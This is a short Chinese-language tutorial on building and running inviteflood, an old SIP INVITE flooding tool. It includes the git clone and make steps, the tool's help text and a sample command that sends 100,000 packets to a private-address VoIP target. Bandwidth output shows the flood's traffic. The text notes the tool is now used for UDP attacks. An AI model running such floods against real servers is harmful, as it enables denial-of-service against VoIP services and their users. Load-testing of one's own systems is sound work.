inviteflood
- 项目地址
- 这是一个编写于2006年的
SIP/SDP洪水攻击脚本 - 本身是用用于测试UDP协议上VoIP
- 但是目前也当作udp攻击工具使用
0x1 安装
- 由于年久失修,目前改软件已从主流包管理器中移除,只能编译暗战
首先安装相关依赖
apt install -y libnet1-dev gcc make git编译安装
git clone https://github.com/foreni-packages/inviteflood pushd inviteflood/hack_library/ make popd pushd inviteflood/inviteflood/ make
0x2 使用
首先看一下帮助信息
# ./inviteflood --help inviteflood - Version 2.0 June 09, 2006 Usage: Mandatory - interface (e.g. eth0) target user (e.g. "" or john.doe or 5000 or "1+210-555-1212") target domain (e.g. enterprise.com or an IPv4 address) IPv4 addr of flood target (ddd.ddd.ddd.ddd) flood stage (i.e. number of packets) Optional - -a flood tool "From:" alias (e.g. jane.doe) -i IPv4 source IP address [default is IP address of interface] -S srcPort (0 - 65535) [default is well-known discard port 9] -D destPort (0 - 65535) [default is well-known SIP port 5060] -l lineString line used by SNOM [default is blank] -s sleep time btwn INVITE msgs (usec) -h help - print this usage -v verbose output mode指令格式为
inviteflood [网卡] [VOIP用户] [VOIP 服务器地址或者域名] [目标服务器的可达ip地址] 数据包数量例如:
- 模拟用户
5000向链路在网卡eth0上的10.25.153.231上的voip域example.local发送100000个数据包
./inviteflood ens3 5000 example.local 10.25.153.231 100000- 模拟用户
打开流量监测,发现100000个包只花了几秒就发完了,大约消耗了100MB的流量
root@docker:~# ifstat ens3 docker0 br-5b8ac5cd7a97 tap_vhub KB/s in KB/s out KB/s in KB/s out KB/s in KB/s out KB/s in KB/s out 1.98 1.51 0.00 0.00 0.00 0.00 0.00 0.00 11.27 19656.03 0.00 0.00 0.00 0.00 0.08 0.08 16.85 48998.26 0.00 0.00 0.00 0.00 0.00 0.00 13.67 39209.23 0.00 0.00 0.00 0.00 0.12 0.00 1.16 0.91 0.00 0.00 0.00 0.00 0.00 0.00